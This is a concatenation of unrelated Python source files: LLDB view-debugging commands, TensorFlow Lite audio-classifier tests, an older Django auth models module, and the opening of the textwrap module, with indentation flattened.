]
def run(self, args, options):
def setBorder(layer, width, color, colorClass):
fb.evaluateEffect("[%s setBorderWidth:(CGFloat)%s]" % (layer, width))
fb.evaluateEffect(
"[%s setBorderColor:(CGColorRef)[(id)[%s %sColor] CGColor]]"
% (layer, colorClass, color)
)
obj = fb.evaluateInputExpression(args[0])
depth = int(options.depth)
isMac = runtimeHelpers.isMacintoshArch()
color = options.color
assert color in self.colors, "Color must be one of the following: {}".format(
" ".join(self.colors)
)
colorClassName = "UIColor"
if isMac:
colorClassName = "NSColor"
if viewHelpers.isView(obj):
prevLevel = 0
for view, level in viewHelpers.subviewsOfView(obj):
if level > depth:
break
if prevLevel != level:
color = self.nextColorAfterColor(color)
prevLevel = level
layer = viewHelpers.convertToLayer(view)
setBorder(layer, options.width, color, colorClassName)
else:
# `obj` is not a view, make sure recursive bordering is not requested
assert (
depth <= 0
), "Recursive bordering is only supported for UIViews or NSViews"
layer = viewHelpers.convertToLayer(obj)
setBorder(layer, options.width, color, colorClassName)
lldb.debugger.HandleCommand("caflush")
def nextColorAfterColor(self, color):
assert color in self.colors, "{} is not a supported color".format(color)
return self.colors[(self.colors.index(color) + 1) % len(self.colors)]
class FBRemoveBorderCommand(fb.FBCommand):
def name(self):
return "unborder"
def description(self):
return "Removes border around <viewOrLayer>."
def options(self):
return [
fb.FBCommandArgument(
short="-d",
long="--depth",
arg="depth",
type="int",
default=0,
help="Number of levels of subviews to unborder.",
)
]
def args(self):
return [
fb.FBCommandArgument(
arg="viewOrLayer",
type="UIView/NSView/CALayer *",
help="The view/layer to unborder.",
)
]
def run(self, args, options):
def setUnborder(layer):
fb.evaluateEffect("[%s setBorderWidth:(CGFloat)%s]" % (layer, 0))
obj = args[0]
depth = int(options.depth)
if viewHelpers.isView(obj):
for view, level in viewHelpers.subviewsOfView(obj):
if level > depth:
break
layer = viewHelpers.convertToLayer(view)
setUnborder(layer)
else:
# `obj` is not a view, make sure recursive unbordering is not requested
assert (
depth <= 0
), "Recursive unbordering is only supported for UIViews or NSViews"
layer = viewHelpers.convertToLayer(obj)
setUnborder(layer)
lldb.debugger.HandleCommand("caflush")
class FBMaskViewCommand(fb.FBCommand):
def name(self):
return "mask"
def description(self):
return "Add a transparent rectangle to the window to reveal a possibly obscured or hidden view or layer's bounds"
def args(self):
return [
fb.FBCommandArgument(
arg="viewOrLayer",
type="UIView/NSView/CALayer *",
help="The view/layer to mask.",
)
]
def options(self):
return [
fb.FBCommandArgument(
short="-c",
long="--color",
arg="color",
type="string",
default="red",
help="A color name such as 'red', 'green', 'magenta', etc.",
),
fb.FBCommandArgument(
short="-a",
long="--alpha",
arg="alpha",
type="CGFloat",
default=0.5,
help="Desired alpha of mask.",
),
]
def run(self, args, options):
viewOrLayer = fb.evaluateObjectExpression(args[0])
viewHelpers.maskView(viewOrLayer, options.color, options.alpha)
class FBUnmaskViewCommand(fb.FBCommand):
def name(self):
return "unmask"
def description(self):
return "Remove mask from a view or layer"
def args(self):
return [
fb.FBCommandArgument(
arg="viewOrLayer",
type="UIView/CALayer *",
help="The view/layer to mask.",
)
]
def run(self, args, options):
viewOrLayer = fb.evaluateObjectExpression(args[0])
viewHelpers.unmaskView(viewOrLayer)
class FBCoreAnimationFlushCommand(fb.FBCommand):
def name(self):
return "caflush"
def description(self):
return "Force Core Animation to flush. This will 'repaint' the UI but also may mess with ongoing animations."
def run(self, arguments, options):
viewHelpers.flushCoreAnimationTransaction()
class FBShowViewCommand(fb.FBCommand):
def name(self):
return "show"
def description(self):
return "Show a view or layer."
def args(self):
return [
fb.FBCommandArgument(
arg="viewOrLayer",
type="UIView/NSView/CALayer *",
help="The view/layer to show.",
)
]
def run(self, args, options):
viewHelpers.setViewHidden(args[0], False)
class FBHideViewCommand(fb.FBCommand):
def name(self):
return "hide"
def description(self):
return "Hide a view or layer."
def args(self):
return [
fb.FBCommandArgument(
arg="viewOrLayer",
type="UIView/NSView/CALayer *",
help="The view/layer to hide.",
)
]
def run(self, args, options):
viewHelpers.setViewHidden(args[0], True)
class FBPresentViewControllerCommand(fb.FBCommand):
def name(self):
return "present"
def description(self):
return "Present a view controller."
def args(self):
return [
fb.FBCommandArgument(
arg="viewController",
type="UIViewController *",
help="The view controller to present.",
)
]
def run(self, args, option):
viewControllerHelpers.presentViewController(args[0])
class FBDismissViewControllerCommand(fb.FBCommand):
def name(self):
return "dismiss"
def description(self):
return "Dismiss a presented view controller."
def args(self):
return [
fb.FBCommandArgument(
arg="viewController",
type="UIViewController *",
help="The view controller to dismiss.",
)
]
def run(self, args, option):
viewControllerHelpers.dismissViewController(args[0])
class FBSlowAnimationCommand(fb.FBCommand):
def name(self):
return "slowanim"
def description(self):
return "Slows down animations. Works on the iOS Simulator and a device."
def args(self):
return [
fb.FBCommandArgument(
arg="speed",
type="float",
default=0.1,
help="Animation speed (default 0.1).",
)
]
def run(self, args, option):
viewHelpers.slowAnimation(args[0])
class FBUnslowAnimationCommand(fb.FBCommand):
def name(self):
return "unslowanim"
def description(self):
return "Turn off slow animations."
def run(self, args, option):
viewHelpers.slowAnimation()
|
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for audio specs."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import unittest
import numpy as np
import tensorflow.compat.v2 as tf
from tensorflow_examples.lite.model_maker.core.task import configs
from tensorflow_examples.lite.model_maker.core.task import model_util
from tensorflow_examples.lite.model_maker.core.task.model_spec import audio_spec
def _gen_dataset(spec, total_samples, num_classes, batch_size, seed):
def fill_shape(new_shape):
@tf.function
def fn(value):
return tf.cast(tf.fill(dims=new_shape, value=value), tf.float32)
return fn
wav_ds = tf.data.experimental.RandomDataset(seed=seed).take(total_samples)
wav_ds = wav_ds.map(fill_shape([
spec.target_sample_rate,
]))
labels = tf.data.Dataset.from_tensor_slices(
np.random.randint(low=0, high=num_classes,
size=total_samples).astype('int32'))
dataset = tf.data.Dataset.zip((wav_ds, labels))
dataset = spec.preprocess_ds(dataset)
@tf.function
def _one_hot_encoding_label(wav, label):
return wav, tf.one_hot(label, num_classes)
dataset = dataset.map(_one_hot_encoding_label)
dataset = dataset.batch(batch_size)
return dataset
class BaseSpecTest(tf.test.TestCase):
def testEnsureVersion(self):
valid_versions = ['2.5.0', '2.5.0rc1', '2.6']
invalid_versions = [
'2.4.1',
]
specs = [audio_spec.YAMNetSpec, audio_spec.BrowserFFTSpec]
tmp_version_fn = audio_spec._get_tf_version
for spec in specs:
for version in valid_versions:
audio_spec._get_tf_version = lambda: version # pylint: disable=cell-var-from-loop
spec()
for version in invalid_versions:
audio_spec._get_tf_version = lambda: version # pylint: disable=cell-var-from-loop
with self.assertRaisesRegexp(RuntimeError, '2.5.0'):
spec()
audio_spec._get_tf_version = tmp_version_fn
class BaseTest(tf.test.TestCase):
def _train_and_export(self,
spec,
num_classes,
filename,
expected_model_size,
quantization_config=None,
training=True):
dataset = _gen_dataset(
spec, total_samples=10, num_classes=num_classes, batch_size=2, seed=100)
model = spec.create_model(num_classes)
epochs = 1 if training else 0
spec.run_classifier(
model, epochs=epochs, train_ds=dataset, validation_ds=None)
tflite_filepath = os.path.join(self.get_temp_dir(), filename)
spec.export_tflite(
model,
tflite_filepath,
index_to_label=['label_{}'.format(i) for i in range(num_classes)],
quantization_config=quantization_config)
self.assertNear(
os.path.getsize(tflite_filepath), expected_model_size, 1000 * 1000)
return tflite_filepath
@unittest.skipIf(tf.__version__ < '2.5',
'Audio Classification requires TF 2.5 or later')
class YAMNetSpecTest(BaseTest):
def _test_preprocess(self, input_shape, input_count, output_shape,
output_count):
spec = audio_spec.YAMNetSpec()
wav_ds = tf.data.Dataset.from_tensor_slices([tf.ones(input_shape)] *
input_count)
label_ds = tf.data.Dataset.range(input_count).map(
lambda x: tf.cast(x, tf.int32))
ds = tf.data.Dataset.zip((wav_ds, label_ds))
ds = spec.preprocess_ds(ds)
chunks = output_count // input_count
cnt = 0
for item, label in ds:
cnt += 1
self.assertEqual(cnt, output_count)
# More thorough checks.
cnt = 0
for item, label in ds:
self.assertEqual(output_shape, item.shape)
self.assertEqual(label, cnt // chunks)
cnt += 1
def test_preprocess(self):
# No padding on the input.
self._test_preprocess(
input_shape=(10,), input_count=2, output_shape=(1024,), output_count=0)
# Split the input data into trunks
self._test_preprocess(
input_shape=(16000 * 2,),
input_count=2,
output_shape=(1024,),
output_count=6)
self._test_preprocess(
input_shape=(15600,),
input_count=1,
output_shape=(1024,),
output_count=1)
def test_create_model(self):
# Make sure that there is no naming conflicts in the graph.
spec = audio_spec.YAMNetSpec()
model = spec.create_model(10)
model = spec.create_model(10)
model = spec.create_model(10)
self.assertEqual(model.input_shape, (None, 1024))
self.assertEqual(model.output_shape, (None, 10))
def test_yamnet_two_heads(self):
tflite_path = self._train_and_export(
audio_spec.YAMNetSpec(keep_yamnet_and_custom_heads=True),
num_classes=2,
filename='two_heads.tflite',
expected_model_size=15 * 1000 * 1000)
self.assertEqual(
2, len(model_util.get_lite_runner(tflite_path).output_details))
self.assertAllEqual(
[1, 521],
model_util.get_lite_runner(tflite_path).output_details[0]['shape'])
self.assertAllEqual(
[1, 2],
model_util.get_lite_runner(tflite_path).output_details[1]['shape'])
self.assertEqual(
model_util.extract_tflite_metadata_json(tflite_path), """{
"name": "yamnet/classification",
"description": "Recognizes sound events",
"version": "v1",
"subgraph_metadata": [
{
"input_tensor_metadata": [
{
"name": "audio_clip",
"description": "Input audio clip to be classified.",
"content": {
"content_properties_type": "AudioProperties",
"content_properties": {
"sample_rate": 16000,
"channels": 1
}
},
"stats": {
}
}
],
"output_tensor_metadata": [
{
"name": "yamnet",
"description": "Scores in range 0..1.0 for each of the 521 output classes.",
"content": {
"content_properties_type": "FeatureProperties",
"content_properties": {
}
},
"stats": {
"max": [
1.0
],
"min": [
0.0
]
},
"associated_files": [
{
"name": "yamnet_labels.txt",
"description": "Labels for categories that the model can recognize.",
"type": "TENSOR_AXIS_LABELS"
}
]
},
{
"name": "custom",
"description": "Scores in range 0..1.0 for each output classes.",
"content": {
"content_properties_type": "FeatureProperties",
"content_properties": {
}
},
"stats": {
"max": [
1.0
],
"min": [
0.0
]
},
"associated_files": [
{
"name": "custom_labels.txt",
"description": "Labels for categories that the model can recognize.",
"type": "TENSOR_AXIS_LABELS"
}
]
}
]
}
],
"author": "TensorFlow Lite Model Maker",
"license": "Apache License. Version 2.0 http://www.apache.org/licenses/LICENSE-2.0.",
"min_parser_version": "1.3.0"
}
""")
def test_yamnet_single_head(self):
tflite_path = self._train_and_export(
audio_spec.YAMNetSpec(keep_yamnet_and_custom_heads=False),
num_classes=2,
filename='single_head.tflite',
expected_model_size=13 * 1000 * 1000)
self.assertEqual(
1, len(model_util.get_lite_runner(tflite_path).output_details))
self.assertAllEqual(
[1, 2],
model_util.get_lite_runner(tflite_path).output_details[0]['shape'])
self.assertEqual(
model_util.extract_tflite_metadata_json(tflite_path), """{
"name": "yamnet/classification",
"description": "Recognizes sound events",
"version": "v1",
"subgraph_metadata": [
{
"input_tensor_metadata": [
{
"name": "audio_clip",
"description": "Input audio clip to be classified.",
"content": {
"content_properties_type": "AudioProperties",
"content_properties": {
"sample_rate": 16000,
"channels": 1
}
},
"stats": {
}
}
],
"output_tensor_metadata": [
{
"name": "custom",
"description": "Scores in range 0..1.0 for each output classes.",
"content": {
"content_properties_type": "FeatureProperties",
"content_properties": {
}
},
"stats": {
"max": [
1.0
],
"min": [
0.0
]
},
"associated_files": [
{
"name": "custom_labels.txt",
"description": "Labels for categories that the model can recognize.",
"type": "TENSOR_AXIS_LABELS"
}
]
}
]
}
],
"author": "TensorFlow Lite Model Maker",
"license": "Apache License. Version 2.0 http://www.apache.org/licenses/LICENSE-2.0.",
"min_parser_version": "1.3.0"
}
""")
def test_no_metadata(self):
audio_spec.ENABLE_METADATA = False
tflite_path = self._train_and_export(
audio_spec.YAMNetSpec(keep_yamnet_and_custom_heads=True),
num_classes=2,
filename='two_heads.tflite',
expected_model_size=15 * 1000 * 1000)
self.assertEqual(
2, len(model_util.get_lite_runner(tflite_path).output_details))
with self.assertRaisesRegex(ValueError, 'The model does not have metadata'):
model_util.extract_tflite_metadata_json(tflite_path)
audio_spec.ENABLE_METADATA = True
def test_binary_classification(self):
self._train_and_export(
audio_spec.YAMNetSpec(keep_yamnet_and_custom_heads=True),
num_classes=2,
filename='binary_classification.tflite',
expected_model_size=15 * 1000 * 1000)
def test_dynamic_range_quantization(self):
self._train_and_export(
audio_spec.YAMNetSpec(keep_yamnet_and_custom_heads=True),
num_classes=5,
filename='basic_5_classes_training.tflite',
expected_model_size=4 * 1000 * 1000,
quantization_config=configs.QuantizationConfig.for_dynamic())
@unittest.skipIf(tf.__version__ < '2.5',
'Audio Classification requires TF 2.5 or later')
class BrowserFFTSpecTest(BaseTest):
@classmethod
def setUpClass(cls):
super(BrowserFFTSpecTest, cls).setUpClass()
cls._spec = audio_spec.BrowserFFTSpec()
def test_model_initialization(self):
model = self._spec.create_model(10)
self.assertEqual(self._spec._preprocess_model.input_shape,
(None, self._spec.EXPECTED_WAVEFORM_LENGTH))
self.assertEqual(self._spec._preprocess_model.output_shape,
(None, None, 232, 1))
self.assertEqual(self._spec._tfjs_sc_model.input_shape, (None, 43, 232, 1))
self.assertEqual(self._spec._tfjs_sc_model.output_shape, (None, 20))
self.assertEqual(model.input_shape, (None, 43, 232, 1))
self.assertEqual(model.output_shape, (None, 10))
def test_create_model(self):
# Make sure that there is no naming conflicts.
self._spec.create_model(100)
self._spec.create_model(100)
self._spec.create_model(100)
tf.keras.backend.clear_session()
# Binary classification is not supported yet.
with self.assertRaises(ValueError):
self._spec.create_model(0)
tf.keras.backend.clear_session()
with self.assertRaises(ValueError):
self._spec.create_model(1)
tf.keras.backend.clear_session()
# It's more efficient to use BinaryClassification when num_classes=2, but
# this is still supported (slightly less efficient).
self._spec.create_model(20)
tf.keras.backend.clear_session()
def test_dynamic_range_quantization(self):
self._train_and_export(
audio_spec.BrowserFFTSpec(),
num_classes=2,
filename='binary_classification.tflite',
expected_model_size=1 * 1000 * 1000,
quantization_config=configs.QuantizationConfig.for_dynamic(),
training=False) # Training results Nan values with the current scheme.
def test_binary_classification(self):
self._train_and_export(
audio_spec.BrowserFFTSpec(),
num_classes=2,
filename='binary_classification.tflite',
expected_model_size=6 * 1000 * 1000)
def test_basic_training(self):
tflite_path = self._train_and_export(
audio_spec.BrowserFFTSpec(),
num_classes=5,
filename='basic_5_classes_training.tflite',
expected_model_size=6 * 1000 * 1000)
self.assertEqual(
model_util.extract_tflite_metadata_json(tflite_path), """{
"name": "AudioClassifier",
"description": "Identify the most prominent type in the audio clip from a known set of categories.",
"version": "v1",
"subgraph_metadata": [
{
"input_tensor_metadata": [
{
"name": "audio_clip",
"description": "Input audio clip to be classified.",
"content": {
"content_properties_type": "AudioProperties",
"content_properties": {
"sample_rate": 44100,
"channels": 1
}
},
"stats": {
}
}
],
"output_tensor_metadata": [
{
"name": "probability",
"description": "Scores of the labels respectively.",
"content": {
"content_properties_type": "FeatureProperties",
"content_properties": {
}
},
"stats": {
"max": [
1.0
],
"min": [
0.0
]
},
"associated_files": [
{
"name": "probability_labels.txt",
"description": "Labels for categories that the model can recognize.",
"type": "TENSOR_AXIS_LABELS"
}
]
}
]
}
],
"author": "TensorFlow Lite Model Maker",
"license": "Apache License. Version 2.0 http://www.apache.org/licenses/LICENSE-2.0.",
"min_parser_version": "1.3.0"
}
""")
if __name__ == '__main__':
# Load compressed models from tensorflow_hub
os.environ['TFHUB_MODEL_LOAD_FORMAT'] = 'COMPRESSED'
tf.test.main()
|
|
from __future__ import unicode_literals
import re
import warnings
from django.core.exceptions import ImproperlyConfigured
from django.core.mail import send_mail
from django.core import validators
from django.db import models
from django.db.models.manager import EmptyManager
from django.utils.crypto import get_random_string
from django.utils.http import urlquote
from django.utils import six
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from django.contrib import auth
# UNUSABLE_PASSWORD is still imported here for backwards compatibility
from django.contrib.auth.hashers import (
check_password, make_password, is_password_usable, UNUSABLE_PASSWORD)
from django.contrib.auth.signals import user_logged_in
from django.contrib.contenttypes.models import ContentType
from django.utils.encoding import python_2_unicode_compatible
def update_last_login(sender, user, **kwargs):
"""
A signal receiver which updates the last_login date for
the user logging in.
"""
user.last_login = timezone.now()
user.save(update_fields=['last_login'])
user_logged_in.connect(update_last_login)
class SiteProfileNotAvailable(Exception):
pass
class PermissionManager(models.Manager):
def get_by_natural_key(self, codename, app_label, model):
return self.get(
codename=codename,
content_type=ContentType.objects.get_by_natural_key(app_label,
model),
)
@python_2_unicode_compatible
class Permission(models.Model):
"""
The permissions system provides a way to assign permissions to specific
users and groups of users.
The permission system is used by the Django admin site, but may also be
useful in your own code. The Django admin site uses permissions as follows:
- The "add" permission limits the user's ability to view the "add" form
and add an object.
- The "change" permission limits a user's ability to view the change
list, view the "change" form and change an object.
- The "delete" permission limits the ability to delete an object.
Permissions are set globally per type of object, not per specific object
instance. It is possible to say "Mary may change news stories," but it's
not currently possible to say "Mary may change news stories, but only the
ones she created herself" or "Mary may only change news stories that have a
certain status or publication date."
Three basic permissions -- add, change and delete -- are automatically
created for each Django model.
"""
name = models.CharField(_('name'), max_length=50)
content_type = models.ForeignKey(ContentType)
codename = models.CharField(_('codename'), max_length=100)
objects = PermissionManager()
class Meta:
verbose_name = _('permission')
verbose_name_plural = _('permissions')
unique_together = (('content_type', 'codename'),)
ordering = ('content_type__app_label', 'content_type__model',
'codename')
def __str__(self):
return "%s | %s | %s" % (
six.text_type(self.content_type.app_label),
six.text_type(self.content_type),
six.text_type(self.name))
def natural_key(self):
return (self.codename,) + self.content_type.natural_key()
natural_key.dependencies = ['contenttypes.contenttype']
class GroupManager(models.Manager):
"""
The manager for the auth's Group model.
"""
def get_by_natural_key(self, name):
return self.get(name=name)
@python_2_unicode_compatible
class Group(models.Model):
"""
Groups are a generic way of categorizing users to apply permissions, or
some other label, to those users. A user can belong to any number of
groups.
A user in a group automatically has all the permissions granted to that
group. For example, if the group Site editors has the permission
can_edit_home_page, any user in that group will have that permission.
Beyond permissions, groups are a convenient way to categorize users to
apply some label, or extended functionality, to them. For example, you
could create a group 'Special users', and you could write code that would
do special things to those users -- such as giving them access to a
members-only portion of your site, or sending them members-only email
messages.
"""
name = models.CharField(_('name'), max_length=80, unique=True)
permissions = models.ManyToManyField(Permission,
verbose_name=_('permissions'), blank=True)
objects = GroupManager()
class Meta:
verbose_name = _('group')
verbose_name_plural = _('groups')
def __str__(self):
return self.name
def natural_key(self):
return (self.name,)
class BaseUserManager(models.Manager):
@classmethod
def normalize_email(cls, email):
"""
Normalize the address by lowercasing the domain part of the email
address.
"""
email = email or ''
try:
email_name, domain_part = email.strip().rsplit('@', 1)
except ValueError:
pass
else:
email = '@'.join([email_name, domain_part.lower()])
return email
def make_random_password(self, length=10,
allowed_chars='abcdefghjkmnpqrstuvwxyz'
'ABCDEFGHJKLMNPQRSTUVWXYZ'
'23456789'):
"""
Generates a random password with the given length and given
allowed_chars. Note that the default value of allowed_chars does not
have "I" or "O" or letters and digits that look similar -- just to
avoid confusion.
"""
return get_random_string(length, allowed_chars)
def get_by_natural_key(self, username):
return self.get(**{self.model.USERNAME_FIELD: username})
class UserManager(BaseUserManager):
def create_user(self, username, email=None, password=None, **extra_fields):
"""
Creates and saves a User with the given username, email and password.
"""
now = timezone.now()
if not username:
raise ValueError('The given username must be set')
email = self.normalize_email(email)
user = self.model(username=username, email=email,
is_staff=False, is_active=True, is_superuser=False,
last_login=now, date_joined=now, **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, username, email, password, **extra_fields):
u = self.create_user(username, email, password, **extra_fields)
u.is_staff = True
u.is_active = True
u.is_superuser = True
u.save(using=self._db)
return u
@python_2_unicode_compatible
class AbstractBaseUser(models.Model):
password = models.CharField(_('password'), max_length=128)
last_login = models.DateTimeField(_('last login'), default=timezone.now)
is_active = True
REQUIRED_FIELDS = []
class Meta:
abstract = True
def get_username(self):
"Return the identifying username for this User"
return getattr(self, self.USERNAME_FIELD)
def __str__(self):
return self.get_username()
def natural_key(self):
return (self.get_username(),)
def is_anonymous(self):
"""
Always returns False. This is a way of comparing User objects to
anonymous users.
"""
return False
def is_authenticated(self):
"""
Always return True. This is a way to tell if the user has been
authenticated in templates.
"""
return True
def set_password(self, raw_password):
self.password = make_password(raw_password)
def check_password(self, raw_password):
"""
Returns a boolean of whether the raw_password was correct. Handles
hashing formats behind the scenes.
"""
def setter(raw_password):
self.set_password(raw_password)
self.save(update_fields=["password"])
return check_password(raw_password, self.password, setter)
def set_unusable_password(self):
# Sets a value that will never be a valid hash
self.password = make_password(None)
def has_usable_password(self):
return is_password_usable(self.password)
def get_full_name(self):
raise NotImplementedError()
def get_short_name(self):
raise NotImplementedError()
# A few helper functions for common logic between User and AnonymousUser.
def _user_get_all_permissions(user, obj):
permissions = set()
for backend in auth.get_backends():
if hasattr(backend, "get_all_permissions"):
permissions.update(backend.get_all_permissions(user, obj))
return permissions
def _user_has_perm(user, perm, obj):
for backend in auth.get_backends():
if hasattr(backend, "has_perm"):
if backend.has_perm(user, perm, obj):
return True
return False
def _user_has_module_perms(user, app_label):
for backend in auth.get_backends():
if hasattr(backend, "has_module_perms"):
if backend.has_module_perms(user, app_label):
return True
return False
class PermissionsMixin(models.Model):
"""
A mixin class that adds the fields and methods necessary to support
Django's Group and Permission model using the ModelBackend.
"""
is_superuser = models.BooleanField(_('superuser status'), default=False,
help_text=_('Designates that this user has all permissions without '
'explicitly assigning them.'))
groups = models.ManyToManyField(Group, verbose_name=_('groups'),
blank=True, help_text=_('The groups this user belongs to. A user will '
'get all permissions granted to each of '
'his/her group.'))
user_permissions = models.ManyToManyField(Permission,
verbose_name=_('user permissions'), blank=True,
help_text='Specific permissions for this user.')
class Meta:
abstract = True
def get_group_permissions(self, obj=None):
"""
Returns a list of permission strings that this user has through his/her
groups. This method queries all available auth backends. If an object
is passed in, only permissions matching this object are returned.
"""
permissions = set()
for backend in auth.get_backends():
if hasattr(backend, "get_group_permissions"):
permissions.update(backend.get_group_permissions(self, obj))
return permissions
def get_all_permissions(self, obj=None):
return _user_get_all_permissions(self, obj)
def has_perm(self, perm, obj=None):
"""
Returns True if the user has the specified permission. This method
queries all available auth backends, but returns immediately if any
backend returns True. Thus, a user who has permission from a single
auth backend is assumed to have permission in general. If an object is
provided, permissions for this specific object are checked.
"""
# Active superusers have all permissions.
if self.is_active and self.is_superuser:
return True
# Otherwise we need to check the backends.
return _user_has_perm(self, perm, obj)
def has_perms(self, perm_list, obj=None):
"""
Returns True if the user has each of the specified permissions. If
object is passed, it checks if the user has all required perms for this
object.
"""
for perm in perm_list:
if not self.has_perm(perm, obj):
return False
return True
def has_module_perms(self, app_label):
"""
Returns True if the user has any permissions in the given app label.
Uses pretty much the same logic as has_perm, above.
"""
# Active superusers have all permissions.
if self.is_active and self.is_superuser:
return True
return _user_has_module_perms(self, app_label)
class AbstractUser(AbstractBaseUser, PermissionsMixin):
"""
An abstract base class implementing a fully featured User model with
admin-compliant permissions.
Username, password and email are required. Other fields are optional.
"""
username = models.CharField(_('username'), max_length=30, unique=True,
help_text=_('Required. 30 characters or fewer. Letters, numbers and '
'@/./+/-/_ characters'),
validators=[
validators.RegexValidator(re.compile('^[\w.@+-]+$'), _('Enter a valid username.'), 'invalid')
])
first_name = models.CharField(_('first name'), max_length=30, blank=True)
last_name = models.CharField(_('last name'), max_length=30, blank=True)
email = models.EmailField(_('email address'), blank=True)
is_staff = models.BooleanField(_('staff status'), default=False,
help_text=_('Designates whether the user can log into this admin '
'site.'))
is_active = models.BooleanField(_('active'), default=True,
help_text=_('Designates whether this user should be treated as '
'active. Unselect this instead of deleting accounts.'))
date_joined = models.DateTimeField(_('date joined'), default=timezone.now)
objects = UserManager()
USERNAME_FIELD = 'username'
REQUIRED_FIELDS = ['email']
class Meta:
verbose_name = _('user')
verbose_name_plural = _('users')
abstract = True
def get_absolute_url(self):
return "/users/%s/" % urlquote(self.username)
def get_full_name(self):
"""
Returns the first_name plus the last_name, with a space in between.
"""
full_name = '%s %s' % (self.first_name, self.last_name)
return full_name.strip()
def get_short_name(self):
"Returns the short name for the user."
return self.first_name
def email_user(self, subject, message, from_email=None):
"""
Sends an email to this User.
"""
send_mail(subject, message, from_email, [self.email])
def get_profile(self):
"""
Returns site-specific profile for this user. Raises
SiteProfileNotAvailable if this site does not allow profiles.
"""
warnings.warn("The use of AUTH_PROFILE_MODULE to define user profiles has been deprecated.",
DeprecationWarning, stacklevel=2)
if not hasattr(self, '_profile_cache'):
from django.conf import settings
if not getattr(settings, 'AUTH_PROFILE_MODULE', False):
raise SiteProfileNotAvailable(
'You need to set AUTH_PROFILE_MODULE in your project '
'settings')
try:
app_label, model_name = settings.AUTH_PROFILE_MODULE.split('.')
except ValueError:
raise SiteProfileNotAvailable(
'app_label and model_name should be separated by a dot in '
'the AUTH_PROFILE_MODULE setting')
try:
model = models.get_model(app_label, model_name)
if model is None:
raise SiteProfileNotAvailable(
'Unable to load the profile model, check '
'AUTH_PROFILE_MODULE in your project settings')
self._profile_cache = model._default_manager.using(
self._state.db).get(user__id__exact=self.id)
self._profile_cache.user = self
except (ImportError, ImproperlyConfigured):
raise SiteProfileNotAvailable
return self._profile_cache
class User(AbstractUser):
"""
Users within the Django authentication system are represented by this
model.
Username, password and email are required. Other fields are optional.
"""
class Meta(AbstractUser.Meta):
swappable = 'AUTH_USER_MODEL'
@python_2_unicode_compatible
class AnonymousUser(object):
id = None
pk = None
username = ''
is_staff = False
is_active = False
is_superuser = False
_groups = EmptyManager(Group)
_user_permissions = EmptyManager(Permission)
def __init__(self):
pass
def __str__(self):
return 'AnonymousUser'
def __eq__(self, other):
return isinstance(other, self.__class__)
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return 1 # instances always return the same hash value
def save(self):
raise NotImplementedError
def delete(self):
raise NotImplementedError
def set_password(self, raw_password):
raise NotImplementedError
def check_password(self, raw_password):
raise NotImplementedError
def _get_groups(self):
return self._groups
groups = property(_get_groups)
def _get_user_permissions(self):
return self._user_permissions
user_permissions = property(_get_user_permissions)
def get_group_permissions(self, obj=None):
return set()
def get_all_permissions(self, obj=None):
return _user_get_all_permissions(self, obj=obj)
def has_perm(self, perm, obj=None):
return _user_has_perm(self, perm, obj=obj)
def has_perms(self, perm_list, obj=None):
for perm in perm_list:
if not self.has_perm(perm, obj):
return False
return True
def has_module_perms(self, module):
return _user_has_module_perms(self, module)
def is_anonymous(self):
return True
def is_authenticated(self):
return False
|
|
"""Text wrapping and filling.
"""
# Copyright (C) 1999-2001 Gregory P. Ward.
# Copyright (C) 2002, 2003 Python Software Foundation.
# Written by Greg Ward <[email protected]>
__revision__ = "$Id: textwrap.py 75231 2009-10-04 14:49:41Z benjamin.peterson $"
import string, re
__all__ = ['TextWrapper', 'wrap', 'fill', 'dedent']
# Hardcode the recognized whitespace characters to the US-ASCII
# whitespace characters. The main reason for doing this is that in
# ISO-8859-1, 0xa0 is non-breaking whitespace, so in certain locales
# that character winds up in string.whitespace. Respecting
# string.whitespace in those cases would 1) make textwrap treat 0xa0 the
# same as any other whitespace char, which is clearly wrong (it's a
# *non-breaking* space), 2) possibly cause problems with Unicode,
# since 0xa0 is not in range(128).
_whitespace = '\t\n\x0b\x0c\r '
class TextWrapper:
"""
Object for wrapping/filling text. The public interface consists of
the wrap() and fill() methods; the other methods are just there for
subclasses to override in order to tweak the default behaviour.
If you want to completely replace the main wrapping algorithm,
you'll probably have to override _wrap_chunks().
Several instance attributes control various aspects of wrapping:
width (default: 70)
the maximum width of wrapped lines (unless break_long_words
is false)
initial_indent (default: "")
string that will be prepended to the first line of wrapped
output. Counts towards the line's width.
subsequent_indent (default: "")
string that will be prepended to all lines save the first
of wrapped output; also counts towards each line's width.
expand_tabs (default: true)
Expand tabs in input text to spaces before further processing.
Each tab will become 1 .. 8 spaces, depending on its position in
its line. If false, each tab is treated as a single character.
replace_whitespace (default: true)
Replace all whitespace characters in the input text by spaces
after tab expansion. Note that if expand_tabs is false and
replace_whitespace is true, every tab will be converted to a
single space!
fix_sentence_endings (default: false)
Ensure that sentence-ending punctuation is always followed
by two spaces. Off by default because the algorithm is
(unavoidably) imperfect.
break_long_words (default: true)
Break words longer than 'width'. If false, those words will not
be broken, and some lines might be longer than 'width'.
break_on_hyphens (default: true)
Allow breaking hyphenated words. If true, wrapping will occur
preferably on whitespaces and right after hyphens part of
compound words.
drop_whitespace (default: true)
Drop leading and trailing whitespace from lines.
"""
unicode_whitespace_trans = {}
uspace = ord(' ')
for x in _whitespace:
unicode_whitespace_trans[ord(x)] = uspace
# This funky little regex is just the trick for splitting
# text up into word-wrappable chunks. E.g.
# "Hello there -- you goof-ball, use the -b option!"
# splits into
# Hello/ /there/ /--/ /you/ /goof-/ball,/ /use/ /the/ /-b/ /option!
# (after stripping out empty strings).
wordsep_re = re.compile(
r'(\s+|' # any whitespace
r'[^\s\w]*\w+[^0-9\W]-(?=\w+[^0-9\W])|' # hyphenated words
r'(?<=[\w\!\"\'\&\.\,\?])-{2,}(?=\w))') # em-dash
# This less funky little regex just split on recognized spaces. E.g.
# "Hello there -- you goof-ball, use the -b option!"
# splits into
